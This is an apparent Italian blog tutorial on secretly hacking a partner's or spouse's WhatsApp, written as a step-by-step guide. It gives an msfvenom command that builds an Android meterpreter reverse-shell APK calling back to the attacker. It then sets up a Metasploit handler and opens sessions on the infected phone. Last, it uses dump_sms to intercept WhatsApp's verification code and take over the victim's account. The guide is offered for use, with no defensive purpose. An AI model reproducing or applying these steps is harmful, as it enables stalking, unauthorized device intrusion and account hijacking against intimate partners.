Come hackerare WhatsApp a distanza 2020


 

 

Mmmmm... ti ho beccato! Di chi vuoi spiare le chat eh?

No dai, scherzo, non mi interessa. Ricordati solo di cancellare la cronologia dopo!

A parte questo...spiare le chat della tua ragazza o ragazzo, tua moglie o tuo marito (tanto è facile capire perché hai cercato questa frase su Google), è molto più facile di quel che sembra, perciò ecco a te la guida completa!

 



REQUISITI:

 

  • Computer con un qualsiasi sistema operativo 
  • Ultima versione di Metasploit Framework che trovi qui:  METASPLOIT

  • 1) Creazione della backdoor

iniziamo a creare il nostro file apk infetto.infatti Metasploit mette a disposizione anche il modulo per la creazione di file apk. Digitiamo quindi da terminale o da msfconsole il seguente comando, che ci restituirà un file apk, pronto per essere scaricato e installato sul device vittima.

  • msfvenom -p android/meterpreter/reverse_tcp LHOST=[ip_macchina_attaccante] LPORT=[porta_per_la_connessione] R > [nome_file].apk

Il payload è pronto, non ci resta che portarlo sul dispositivo mobile.

 

2)Impostare L'handler

Disattivato il controllo delle fonti sicure sul dispositivo, avviamo msfconsole con il comando msfconsole e impostiamo un handler generico per android

 

  • msfconsole
  • use exploit/multi/handler
  • set PAYLOAD android/meterpreter/reverse_tcp
  • set LHOST [ip_macchina_attaccante]
  • set LPORT [porta_per_la_connessione]

3)Lanciare l'exploit e collegarsi al dispositivo

 

lanciamo il nostro exploit digitando

 

  • exploit

e installiamo l'apk infetto sul dispositivo.

una volta fatto digitiamo

  • sessions -l
  • sessions -i [numero sessione]
4)Hackerare WhatsApp
Ora dal nostro cellulare, installiamo WhatsApp (disistallandolo se è già presente) e iscriviamoci alla piattaforma con il numero della vittima.
Quando WhatsApp attende la conferma del numero di telefono (mandando un codice per messaggio), digita dal terminale
  •  dump_sms
Ora selezioniamo il messaggio di conferma inviato da WhatsApp e trascriviamo il codice inviato sul nostro telefono.
5)Successo!
Ora avrai sul tuo telefono l'esatta copia dell'ultimo backup di WhatsApp della vittima. 
Potrai ricevere e scrivere messaggi, cambiare lo stato e chiamare.